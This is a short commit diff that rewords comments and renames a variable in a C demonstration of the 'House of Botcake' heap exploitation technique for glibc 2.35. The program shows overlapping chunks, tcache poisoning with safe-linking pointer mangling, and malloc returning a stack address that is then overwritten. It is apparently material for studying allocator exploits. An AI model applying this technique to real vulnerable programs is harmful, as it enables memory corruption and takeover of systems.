reword

Author: tesuji

glibc_2.35/house_of_botcake.c

@@ -62,19 +62,25 @@ int main()
     /*VULNERABILITY*/
 
     puts("Now we have the chunk overlapping primitive:");
-    puts("Malloc from the unsorted bin to control a->next pointer");
+    puts("This primitive will allow directly reading/writing objects, heap metadata, etc.\n");
+    puts("Below will use the chunk overlapping primitive to perform a tcache poisoning attack.");
+
+    puts("Get the overlapping chunk from the unsorted bin.");
     intptr_t *unsorted = malloc(0x100 + 0x100 + 0x10);
+    puts("Use the overlapping chunk to control a->next pointer.");
     // mangle the pointer since glibc 2.32
-    unsorted[0x110/sizeof(intptr_t)] = ((long)a >> 12) ^(long)stack_var;
+    unsorted[0x110/sizeof(intptr_t)] = ((long)a >> 12) ^ (long)stack_var;
 
+    puts("Get back victim chunk from tcache. This will put target to tcache top.");
     a = malloc(0x100);
     int a_size = a[-1] & 0xff0;
+    printf("victim @ %p, size: %#x, end @ %p\n", a, a_size, (void *)a+a_size);
 
-    intptr_t *victim = malloc(0x100);
-    victim[0] = 0xcafebabe;
+    puts("Get the target chunk from tcache.");
+    intptr_t *target = malloc(0x100);
+    target[0] = 0xcafebabe;
 
-    printf("a      @ %p, size: %#x, end @ %p\n", a, a_size, (void *)a+a_size);
-    printf("victim @ %p == stack_var @ %p\n", victim, stack_var);
+    printf("target @ %p == stack_var @ %p\n", target, stack_var);
     assert(stack_var[0] == 0xcafebabe);
     return 0;
 }